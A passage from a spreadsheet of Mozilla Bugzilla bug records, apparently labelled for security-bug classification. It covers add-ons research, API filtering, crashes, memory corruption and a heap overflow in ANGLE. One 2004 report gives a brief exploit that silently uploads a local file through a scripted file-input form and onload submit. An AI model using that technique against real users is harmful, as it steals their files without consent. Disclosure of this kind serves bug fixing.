  frees   by size class: 8:178460; 9:17981; 10:7052; 11:3628; 12:1110; 13:952; 14:391; 15:125; 16:655; 17:74; 18:106; 19:4; 20:4;
  rfrees  by size class:
Stats: malloc large: 222 small slow: 1511
==32448== ABORTING</t>
        </is>
      </c>
      <c r="X404" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="405">
      <c r="A405" t="n">
        <v>1595184</v>
      </c>
      <c r="B405" t="inlineStr">
        <is>
          <t>2019-11-08 12:38:29 -0800</t>
        </is>
      </c>
      <c r="C405" t="inlineStr">
        <is>
          <t>Add-ons: Capture Fennec user feedback on the Add-ons experience to improve it for Fenix</t>
        </is>
      </c>
      <c r="D405" t="inlineStr">
        <is>
          <t>2020-02-10 07:39:24 -0800</t>
        </is>
      </c>
      <c r="E405" t="n">
        <v>1</v>
      </c>
      <c r="F405" t="n">
        <v>1</v>
      </c>
      <c r="G405" t="n">
        <v>5</v>
      </c>
      <c r="H405" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I405" t="inlineStr">
        <is>
          <t>User Research</t>
        </is>
      </c>
      <c r="J405" t="inlineStr">
        <is>
          <t>Project Request</t>
        </is>
      </c>
      <c r="K405" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L405" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M405" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N405" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O405" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P405" t="inlineStr"/>
      <c r="Q405" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R405" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S405" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T405" t="n">
        <v>1</v>
      </c>
      <c r="U405" t="n">
        <v>0</v>
      </c>
      <c r="V405" t="n">
        <v>2</v>
      </c>
      <c r="W405" t="inlineStr">
        <is>
          <t>**Request Description** 
Fenix PM and UX teammates would like to understand more about the current add-ons experience in Fennec as we prepare to refine and evolve the experience for Fenix.
Research Questions include:
- What does the phrase “add-ons” mean to users? How do they define them? (General web extensions, certain categories, etc.)?
- What do they have now, on their desktop? On their phone?
- Reasons to incorporate add-ons on phone vs. desktop: what is the difference? What drives the customization?
- What triggered reviewing/deciding/installing their first add-on? Subsequent add-ons?
- Is this something they did once, after installing, or do they regularly review and pursue new add-ons to change your experience?
- Have they ever installed an add-on and then removed it? Why?
- Are there categories of add-ons they would like to see?
- Are new potential add-ons discoverable in the current experience? Barriers? Things to retain?
- Are installed add-ons easy to manage in the current experience?
**Deadline** 
January 20, 2020 (with prototyping added)
**Priority Level** 
(1 = High 2 = Medium, 3 = Low):
**Priority Level Description** 
(Please provide information on how you chose the priority level above, which product management OKR(s) this work supports, or any other details that will help us triage and prioritize this request.) 
**Supporting Information**
(Links to any assets or previous research relevant to this project.)</t>
        </is>
      </c>
      <c r="X405" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="406">
      <c r="A406" t="n">
        <v>911414</v>
      </c>
      <c r="B406" t="inlineStr">
        <is>
          <t>2013-08-30 19:52:08 -0700</t>
        </is>
      </c>
      <c r="C406" t="inlineStr">
        <is>
          <t>Collection API should allow filtering on empty values</t>
        </is>
      </c>
      <c r="D406" t="inlineStr">
        <is>
          <t>2013-09-06 05:23:09 -0700</t>
        </is>
      </c>
      <c r="E406" t="n">
        <v>1</v>
      </c>
      <c r="F406" t="n">
        <v>1</v>
      </c>
      <c r="G406" t="n">
        <v>6</v>
      </c>
      <c r="H406" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I406" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J406" t="inlineStr">
        <is>
          <t>API</t>
        </is>
      </c>
      <c r="K406" t="inlineStr">
        <is>
          <t>1.5</t>
        </is>
      </c>
      <c r="L406" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M406" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N406" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O406" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P406" t="inlineStr">
        <is>
          <t>[qa-]</t>
        </is>
      </c>
      <c r="Q406" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R406" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S406" t="inlineStr">
        <is>
          <t>2013-09-10</t>
        </is>
      </c>
      <c r="T406" t="n">
        <v>1</v>
      </c>
      <c r="U406" t="n">
        <v>0</v>
      </c>
      <c r="V406" t="n">
        <v>5</v>
      </c>
      <c r="W406" t="inlineStr">
        <is>
          <t>The Collection API currently doesn't let you filter on empty values, such as '?category='. It's needed to be able to find Collections that have category=None.
This is going to require either patching django-filter or just completely remove django-filter, because it really doesn't like None/'' values.
Originally reported in https://bugzilla.mozilla.org/show_bug.cgi?id=911382 but I splitted the bug in two.</t>
        </is>
      </c>
      <c r="X406" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="407">
      <c r="A407" t="n">
        <v>1569582</v>
      </c>
      <c r="B407" t="inlineStr">
        <is>
          <t>2019-07-29 05:55:40 -0700</t>
        </is>
      </c>
      <c r="C407" t="inlineStr">
        <is>
          <t>make Bug_1541161 searchable</t>
        </is>
      </c>
      <c r="D407" t="inlineStr">
        <is>
          <t>2019-08-02 06:55:27 -0700</t>
        </is>
      </c>
      <c r="E407" t="n">
        <v>1</v>
      </c>
      <c r="F407" t="n">
        <v>1</v>
      </c>
      <c r="G407" t="n">
        <v>4</v>
      </c>
      <c r="H407" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I407" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J407" t="inlineStr">
        <is>
          <t>Webapp</t>
        </is>
      </c>
      <c r="K407" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L407" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M407" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N407" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O407" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P407" t="inlineStr"/>
      <c r="Q407" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R407" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S407" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T407" t="n">
        <v>1</v>
      </c>
      <c r="U407" t="n">
        <v>0</v>
      </c>
      <c r="V407" t="n">
        <v>4</v>
      </c>
      <c r="W407" t="inlineStr">
        <is>
          <t>Marcia and Christoph need Bug_!541161 to be searchable so as to help figure out that bug.
It contains a stacktrace, so I think we should have it require pii permissions for now. I think we can set it up to index and query as a string.
Example crash: bp-6f06ebaa-6a88-49a3-85e6-629170190725</t>
        </is>
      </c>
      <c r="X407" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="408">
      <c r="A408" t="n">
        <v>1270393</v>
      </c>
      <c r="B408" t="inlineStr">
        <is>
          <t>2016-05-05 00:03:48 -0700</t>
        </is>
      </c>
      <c r="C408" t="inlineStr">
        <is>
          <t>[TV][Home] Always prompt confirmation dialog if press back key on card selection page of creating folder</t>
        </is>
      </c>
      <c r="D408" t="inlineStr">
        <is>
          <t>2016-05-17 20:02:18 -0700</t>
        </is>
      </c>
      <c r="E408" t="n">
        <v>1</v>
      </c>
      <c r="F408" t="n">
        <v>1</v>
      </c>
      <c r="G408" t="n">
        <v>6</v>
      </c>
      <c r="H408" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I408" t="inlineStr">
        <is>
          <t>Firefox OS Graveyard</t>
        </is>
      </c>
      <c r="J408" t="inlineStr">
        <is>
          <t>Gaia::TV::Home</t>
        </is>
      </c>
      <c r="K408" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L408" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M408" t="inlineStr">
        <is>
          <t>Gonk (Firefox OS)</t>
        </is>
      </c>
      <c r="N408" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O408" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P408" t="inlineStr">
        <is>
          <t>[ft:conndevices]</t>
        </is>
      </c>
      <c r="Q408" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R408" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S408" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T408" t="n">
        <v>1</v>
      </c>
      <c r="U408" t="n">
        <v>0</v>
      </c>
      <c r="V408" t="n">
        <v>5</v>
      </c>
      <c r="W408" t="inlineStr">
        <is>
          <t>[Description]
According to the latest UX spec(https://drive.google.com/open?id=0BwbmH5cX2W6Od0EwMXpSWlFwcDQ), if user doesn't select any card in card selection page, press back key should back to home screen directly
[Testing Steps]
1. Focus on any card
2. Navigate to Add folder then press OK key
3. Press Back key
[Expected result]
Back to home screen directly
[Actual result]
Confirmation dialog will prompt
[Build Info]
Environment: 2.6 Simulator
gaia:
https://github.com/mozilla-b2g/gaia/commit/4698bb1d24fac0db76f1f16f144cf0dae4bc3c23
gecko:
https://github.com/mozilla-b2g/gecko-b2g/commit/ccf59a9dda868db58b5d943e2c4235ead89f9344</t>
        </is>
      </c>
      <c r="X408" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="409">
      <c r="A409" t="n">
        <v>805957</v>
      </c>
      <c r="B409" t="inlineStr">
        <is>
          <t>2012-10-26 13:46:33 -0700</t>
        </is>
      </c>
      <c r="C409" t="inlineStr">
        <is>
          <t>Possible memory corruption of nsDeviceContext</t>
        </is>
      </c>
      <c r="D409" t="inlineStr">
        <is>
          <t>2013-03-18 13:11:50 -0700</t>
        </is>
      </c>
      <c r="E409" t="n">
        <v>1</v>
      </c>
      <c r="F409" t="n">
        <v>1</v>
      </c>
      <c r="G409" t="n">
        <v>3</v>
      </c>
      <c r="H409" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I409" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J409" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K409" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L409" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M409" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N409" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O409" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P409" t="inlineStr">
        <is>
          <t>[adv-track-main17+][adv-track-esr17+]</t>
        </is>
      </c>
      <c r="Q409" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R409" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S409" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T409" t="n">
        <v>1</v>
      </c>
      <c r="U409" t="n">
        <v>0</v>
      </c>
      <c r="V409" t="n">
        <v>14</v>
      </c>
      <c r="W409" t="inlineStr">
        <is>
          <t>Bug 776505 involves an intermittent orange with ASSERTION: nsDeviceContext not thread-safe: '_mOwningThread.GetThread() == PR_GetCurrentThread().  roc landed an assertion in nsDeviceContext's constructor that it is being created on the main thread, but it does not seem to be triggering in that case. Given that, it seems that it is likely that there is some kind of memory corruption. If the field that stores the thread ID gets messed up, then we'll fail this assertion, even though it is only ever used on the main thread.
The stacks seem to always look like:
0  XUL!nsDeviceContext::AddRef() [nsDeviceContext.h : 26 + 0x0]
1  XUL!nsRenderingContext::Init(nsDeviceContext*, gfxContext*) [nsAutoPtr.h : 845 + 0x7]
2  XUL!PresShell::RenderDocument(nsRect const&amp;, unsigned int, unsigned int, gfxContext*) [nsPresShell.cpp : 4359 + 0xd]
3  XUL!mozilla::dom::CanvasRenderingContext2D::DrawWindow(nsIDOMWindow*, double, double, double, double, nsAString_internal const&amp;, unsigned int, mozilla::ErrorResult&amp;) [CanvasRenderingContext2D.cpp : 3962 + 0xb]
4  XUL!mozilla::dom::CanvasRenderingContext2DBinding::drawWindow [CanvasRenderingContext2DBinding.cpp : 1868 + 0x43]
5  XUL!mozilla::dom::CanvasRenderingContext2DBinding::genericMethod [CanvasRenderingContext2DBinding.cpp : 2570 + 0x12]
This is the strip of code in question:
4347   nsDeviceContext* devCtx = mPresContext-&gt;DeviceContext();
4348   gfxFloat scale = gfxFloat(devCtx-&gt;AppUnitsPerDevPixel())/nsPresContext::AppUnitsPerCSSPixel();
4349   aThebesContext-&gt;Scale(scale, scale);
4354   aThebesContext-&gt;NudgeCurrentMatrixToIntegers();
4356   AutoSaveRestoreRenderingState _(this);
4358   nsRefPtr&lt;nsRenderingContext&gt; rc = new nsRenderingContext();
4359   rc-&gt;Init(devCtx, aThebesContext);
Not knowing anything about this code, my spideysense did start tingling at that raw pointer to the devCtx. |this| strongly holds mPresContext, which strongly holds its device context, but I guess if either of those fields changes in between line 4347 and 4359 then we could have a UAF. To fix that problem, devCtx could become a strong pointer, or just be inlined, as it is only used twice. We could also add an assert that devCtx is the same as mPresContext-&gt;DeviceContext() before the Init, assuming that should be the case.
Kyle also suggested the possibility that devCtx is just corrupt from the get-go. This could be tested by landing an assertion in DeviceContext() to check valid threadedness of the nsDeviceContext.
I'm slightly nervous about poking around with exploratory asserts, as it points out possible security problems, but maybe it isn't a big deal.</t>
        </is>
      </c>
      <c r="X409" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="410">
      <c r="A410" t="n">
        <v>241924</v>
      </c>
      <c r="B410" t="inlineStr">
        <is>
          <t>2004-04-28 00:48:18 -0700</t>
        </is>
      </c>
      <c r="C410" t="inlineStr">
        <is>
          <t>Mozilla can upload files without user confirmation</t>
        </is>
      </c>
      <c r="D410" t="inlineStr">
        <is>
          <t>2004-08-03 00:46:47 -0700</t>
        </is>
      </c>
      <c r="E410" t="n">
        <v>1</v>
      </c>
      <c r="F410" t="n">
        <v>1</v>
      </c>
      <c r="G410" t="n">
        <v>3</v>
      </c>
      <c r="H410" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I410" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J410" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K410" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L410" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M410" t="inlineStr">
        <is>
          <t>Windows 2000</t>
        </is>
      </c>
      <c r="N410" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O410" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P410" t="inlineStr">
        <is>
          <t>[sg:fix] vuln 1.7a/b,  fixed 1.7rc1  doesnotaffect1.4</t>
        </is>
      </c>
      <c r="Q410" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R410" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S410" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T410" t="n">
        <v>1</v>
      </c>
      <c r="U410" t="n">
        <v>0</v>
      </c>
      <c r="V410" t="n">
        <v>26</v>
      </c>
      <c r="W410" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.0; cs-CZ; rv:1.7) Gecko/20040425
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.0; cs-CZ; rv:1.7) Gecko/20040425
Description:
In the last Mozilla versions (the M1.7b and later - detail list see bellow) can
malicious JavaScript code upload files from the user computer without user
confirmation.
This is happening via classical &lt;input type="file"&gt; tag. The value of this tag
should be read only. If you give it some value="" in the HTML file, it should be
ignored. But unfortunately if you create input type="file" via document.write(),
its value is not cleared!!! e.g.: "document.write('&lt;input name=\'u\' type="file"
value="c:\\autoexec.bat"&gt;');" can (after some onload="document.f.submit()")
upload "c:\autoexec.bat" to the server.
List of tested Mozilla versions (I have tested only Windows versions, sorry):
M1.6 not affected
Firefox 0.8 not affected
M1.7a not affected
M1.7b AFFECTED!
M1.7 last build AFFECTED! (Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US;
rv:1.7) Gecko/20040427)
See attachment for example (look at the value in input box).
If you want to see malicious code in action, look at the
http://www.penguin.cz/~met/pub/bug/form.html , but beware! During onload it will
automatically send your c:\autoexec.bat (sorry for Linux users 8-) to the server
and display it as the result in iframe bellow (yes, autoexec.bat is in the
Win2000/XP completely blank, so if you want to really test it, write some REM
comments in it).
(Ehm, sorry, but there is some problem on the penguin.cz server. Sometimes it
loads main www.penguin.cz page instead of my URL. So if you see blank page with
penguin logo, be patient and reload 8-)
Reproducible: Always
Steps to Reproduce:</t>
        </is>
      </c>
      <c r="X410" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="411">
      <c r="A411" t="n">
        <v>1402372</v>
      </c>
      <c r="B411" t="inlineStr">
        <is>
          <t>2017-09-22 09:16:14 -0700</t>
        </is>
      </c>
      <c r="C411" t="inlineStr">
        <is>
          <t>heap buffer overflow in VertexBuffer9 (ANGLE)</t>
        </is>
      </c>
      <c r="D411" t="inlineStr">
        <is>
          <t>2024-05-30 09:37:00 -0700</t>
        </is>
      </c>
      <c r="E411" t="n">
        <v>1</v>
      </c>
      <c r="F411" t="n">
        <v>1</v>
      </c>
      <c r="G411" t="n">
        <v>3</v>
      </c>
      <c r="H411" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I411" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J411" t="inlineStr">
        <is>
          <t>Graphics: CanvasWebGL</t>
        </is>
      </c>
      <c r="K411" t="inlineStr">
        <is>
          <t>45 Branch</t>
        </is>
      </c>
      <c r="L411" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M411" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N411" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O411" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P411" t="inlineStr">
        <is>
          <t>[gfx-noted][adv-main57+][adv-esr52.5.1+]</t>
        </is>
      </c>
      <c r="Q411" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R411" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S411" t="inlineStr">
        <is>
          <t>mozilla58</t>
        </is>
      </c>
      <c r="T411" t="n">
        <v>1</v>
      </c>
      <c r="U411" t="n">
        <v>0</v>
      </c>
      <c r="V411" t="n">
        <v>78</v>
      </c>
      <c r="W411" t="inlineStr">
        <is>
          <t>Created attachment 8911233
D3D9.html
User Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
Steps to reproduce:
I have attached the same PoC (Bug 1398381) which can be used to trigger a heap overflow in ANGLE. 
(You can disable hardware acceleration and test.)
I have tested this on: 58 nightly build (should be applicable to the current stable build as well)
libglesv2.dll!memcpy + ? (the exact offset is not known) (id: 72d)
libglesv2.dll!rx::VertexBuffer9::storeVertexAttributes + 0x1D4 (id: 791) [[z:\build\build\src\gfx\angle\src\libangle\renderer\d3d\d3d9\vertexbuffer9.cpp @ 109]]
libglesv2.dll!rx::StreamingVertexBufferInterface::storeDynamicAttribute + 0x204 [[z:\build\build\src\gfx\angle\src\libangle\renderer\d3d\vertexbuffer.cpp @ 173]]
libglesv2.dll!rx::VertexDataManager::storeDynamicAttrib + 0x240 [[z:\build\build\src\gfx\angle\src\libangle\renderer\d3d\vertexdatamanager.cpp @ 480]]
libglesv2.dll!rx::VertexDataManager::storeDynamicAttribs + 0x25A [[z:\build\build\src\gfx\angle\src\libangle\renderer\d3d\vertexdatamanager.cpp @ 400]]
libglesv2.dll!rx::VertexDataManager::prepareVertexData + 0x2DA [[z:\build\build\src\gfx\angle\src\libangle\renderer\d3d\vertexdatamanager.cpp @ 275]]
libglesv2.dll!rx::Renderer9::applyVertexBuffer + 0x5E [[z:\build\build\src\gfx\angle\src\libangle\renderer\d3d\d3d9\renderer9.cpp @ 1285]]
libglesv2.dll!rx::Renderer9::genericDrawElements + 0x1A8 [[z:\build\build\src\gfx\angle\src\libangle\renderer\d3d\d3d9\renderer9.cpp @ 2984]]
libglesv2.dll!rx::Context9::drawElements + 0x47 [[z:\build\build\src\gfx\angle\src\libangle\renderer\d3d\d3d9\context9.cpp @ 157]]
libglesv2.dll!gl::Context::drawElements + 0x33 (inlined function) [[z:\build\build\src\gfx\angle\src\libangle\context.cpp @ 1654]]
libglesv2.dll!gl::DrawElements + 0xB2 [[z:\build\build\src\gfx\angle\src\libglesv2\entry_points_gles_2_0.cpp @ 791]]
xul.dll!mozilla::gl::GLContext::raw_fDrawElements + 0x1A (inlined function) [[z:\build\build\src\gfx\gl\glcontext.h @ 1101]]
xul.dll!mozilla::gl::GLContext::fDrawElements + 0x26 [[z:\build\build\src\gfx\gl\glcontext.h @ 1115]]
xul.dll!mozilla::WebGLContext::DrawElements + 0x13F [[z:\build\build\src\dom\canvas\webglcontextdraw.cpp @ 811]]
xul.dll!mozilla::dom::WebGLRenderingContextBinding::drawElements + 0xB6 [[z:\build\build\src\obj-firefox\dom\bindings\webglrenderingcontextbinding.cpp @ 16256]]
xul.dll!mozilla::dom::GenericBindingMethod + 0x12A [[z:\build\build\src\dom\bindings\bindingutils.cpp @ 3061]]
xul.dll!js::CallJSNative + 0xA3 (inlined function) [[z:\build\build\src\js\src\jscntxtinlines.h @ 293]]
xul.dll!InternalCall + ? (the exact offset is not known) [[z:\build\build\src\js\src\vm\interpreter.cpp @ 495]]
xul.dll!js::CallFromStack + 0xD (inlined function) [[z:\build\build\src\js\src\vm\interpreter.cpp @ 546]]
xul.dll!js::jit::DoCallFallback + 0x24A [[z:\build\build\src\js\src\jit\baselineic.cpp @ 2589]]
0x2E8E572D08E (no function symbol available)
0x18453FC480 (no function symbol available)
0x18453FC1B0 (no function symbol available)
0xFFFE01216EA6D940 (no function symbol available)
0xEEE4421FD838 (no function symbol available)
0x18453FC430 (no function symbol available)
0x18453FC3E8 (no function symbol available)
0x4 (no function symbol available)
0x18453FC3E8 (no function symbol available)</t>
        </is>
      </c>
      <c r="X411" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="412">
      <c r="A412" t="n">
        <v>1115776</v>
      </c>
      <c r="B412" t="inlineStr">
        <is>
          <t>2014-12-26 14:00:49 -0800</t>
        </is>
      </c>
      <c r="C412" t="inlineStr">
        <is>
          <t>Crashes in EnterIon on Pinterest</t>
        </is>
      </c>
      <c r="D412" t="inlineStr">
        <is>
          <t>2016-10-04 09:55:39 -0700</t>
        </is>
      </c>
      <c r="E412" t="n">
        <v>1</v>
      </c>
      <c r="F412" t="n">
        <v>1</v>
      </c>
      <c r="G412" t="n">
        <v>3</v>
      </c>
      <c r="H412" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I412" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J412" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K412" t="inlineStr">
        <is>
          <t>34 Branch</t>
        </is>
      </c>
      <c r="L412" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M412" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N412" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O412" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P412" t="inlineStr">
        <is>
          <t>[adv-main36+][adv-esr31.5+]</t>
        </is>
      </c>
      <c r="Q412" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R412" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S412" t="inlineStr">
        <is>
          <t>mozilla38</t>
        </is>
      </c>
      <c r="T412" t="n">
        <v>1</v>
      </c>
      <c r="U412" t="n">
        <v>0</v>
      </c>
      <c r="V412" t="n">
        <v>27</v>
      </c>
      <c r="W412" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is 
report bp-7084ac9f-b873-4608-adeb-159db2141219.
=============================================================
This is currently the #6 topcrash for Firefox 34.0.5 with 4467/162224 crashes in the last 7 days. It's in the top 10 crash signatures for 34.0 as well. 
Many comments mention Pinterest. 
crashing thread:
0 		@0xabe23b7 	
1 	mozjs.dll 	EnterIon 	js/src/jit/Ion.cpp
2 	mozjs.dll 	js::jit::IonCannon(JSContext*, js::RunState&amp;) 	js/src/jit/Ion.cpp
3 	mozjs.dll 	Interpret 	js/src/vm/Interpreter.cpp
4 	mozjs.dll 	CanEnterBaselineJIT 	js/src/jit/BaselineJIT.cpp
5 	mozjs.dll 	js::InterpreterFrame::epilogue(JSContext*) 	js/src/vm/Stack.cpp
6 	mozjs.dll 	Interpret 	js/src/vm/Interpreter.cpp
7 	mozjs.dll 	JSObject::putProperty&lt;0&gt;(js::ExclusiveContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, bool (*)(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;), bool (*)(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, bool, JS::MutableHandle&lt;JS::Value&gt;), unsigned int, unsigned int, unsigned int) 	js/src/vm/Shape.cpp
8 	mozjs.dll 	DefinePropertyOrElement&lt;0&gt; 	js/src/jsobj.cpp
9 	mozjs.dll 	js::GetElements(JSContext*, JS::Handle&lt;JSObject*&gt;, unsigned int, JS::Value*) 	js/src/jsarray.cpp
10 	mozjs.dll 	mozjs.dll@0x2033ff 	
11 		@0x17d78f3f 	
12 	mozjs.dll 	js::types::TypeObject::markPropertyNonData(js::ExclusiveContext*, jsid) 	js/src/jsinfer.cpp
13 	mozjs.dll 	js::types::MarkTypePropertyNonData(js::ExclusiveContext*, JSObject*, jsid) 	js/src/jsinferinlines.h
14 	mozjs.dll 	JSObject::changeProperty&lt;0&gt;(js::ExclusiveContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;js::Shape*&gt;, unsigned int, unsigned int, bool (*)(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;), bool (*)(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;jsid&gt;, bool, JS::MutableHandle&lt;JS::Value&gt;)) 	js/src/vm/Shape.cpp
15 	mozjs.dll 	js::jit::GetPcScript(JSContext*, JSScript**, unsigned char**) 	js/src/jit/IonFrames.cpp
16 	mozjs.dll 	js::types::TypeMonitorResult(JSContext*, JSScript*, unsigned char*, JS::Value const&amp;)</t>
        </is>
      </c>
      <c r="X412" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="413">
      <c r="A413" t="n">
        <v>80587</v>
      </c>
      <c r="B413" t="inlineStr">
        <is>
          <t>2001-05-13 09:11:14 -0700</t>
        </is>
      </c>
      <c r="C413" t="inlineStr">
        <is>
          <t>cvs-mirror is ignoring 'core' directories</t>
        </is>
      </c>
      <c r="D413" t="inlineStr">
        <is>
          <t>2015-03-12 08:17:16 -0700</t>
        </is>
      </c>
      <c r="E413" t="n">
        <v>1</v>
      </c>
      <c r="F413" t="n">
        <v>1</v>
      </c>
      <c r="G413" t="n">
        <v>6</v>
      </c>
      <c r="H413" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I413" t="inlineStr">
        <is>
          <t>mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J413" t="inlineStr">
        <is>
          <t>Server Operations</t>
        </is>
      </c>
      <c r="K413" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L413" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M413" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N413" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O413" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P413" t="inlineStr"/>
      <c r="Q413" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R413" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S413" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T413" t="n">
        <v>1</v>
      </c>
      <c r="U413" t="n">
        <v>0</v>
      </c>
      <c r="V413" t="n">
        <v>13</v>
      </c>
      <c r="W413" t="inlineStr">
        <is>
          <t>Because the cvs server version on cvs.mozilla.org is old, and doesn't do
